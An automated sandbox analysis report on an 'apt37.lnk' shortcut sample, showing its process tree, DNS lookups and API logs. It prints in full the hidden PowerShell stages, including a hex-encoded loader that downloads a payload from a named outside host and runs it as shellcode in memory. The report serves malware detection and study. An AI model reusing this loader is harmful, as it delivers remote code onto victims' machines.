popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

apt37.lnk

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P PDF Hide_URL DGA Http API FTP Socket Escalate priviledges DNS Code injection Sniff Audio Steal credential GIF Format AntiDebug DLL AntiVM .NET DLL
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 May 25, 2023, 10:49 a.m. May 25, 2023, 10:51 a.m.
Size 22.4MB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=1, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 7095811df4cb1ee4135ce605af7f163f
SHA256 4056772ab9ec106046cc2dfbeed71df92d629e5b612f12775f942c0d3255552d
CRC32 77EF5E16
ssdeep 24576:zKRluuFLcJLfnhWnLS98aLfKwNUXleXR9zYkh5kx94vyD223l9xU:GRdqG+iwgMYkMcyNc
Yara
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "bCPmm" C:\Users\test22\AppData\Local\Temp\apt37.lnk

    3008

    • cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk ^| where-object {$_.length -eq 0x0001673333} ^| Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP ^| select -Skip 004820)) -Encoding Byte; ^& $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 ^| select -Skip 01246865)) -Encoding Byte; ^& $Ok;

      2216

      • powershell.exe powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk | where-object {$_.length -eq 0x0001673333} | Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP | select -Skip 004820)) -Encoding Byte; & $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 | select -Skip 01246865)) -Encoding Byte; & $Ok;

        2260

        • AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf"

          2656

        • cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\PMTRD.bat""

          376

          • cmd.exe C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"

            2804

            • powershell.exe powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"

              1916

Name Response Post-Analysis Lookup
vmi810830.contaboserver.net
A 75.119.136.207
75.119.136.207
IP Address Status Action
164.124.101.2 Active Moloch
75.119.136.207 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /min C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "The requested security protocol is not s
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: upported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:28
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + [Net.ServicePointManager]:: <<<< SecurityProtocol=[Enum]::ToObject([Net.Secur
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: ityProtocolType], 3072);
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x0000006b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006afee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0420
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006ff370
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006fffb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006fffb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006fffb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006ffcb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file c:\program files\mozilla firefox\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET http://vmi810830.contaboserver.net/local/cache-js/f93754e660802d7cc70924cceb4738ef.gz
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 458752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73922000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
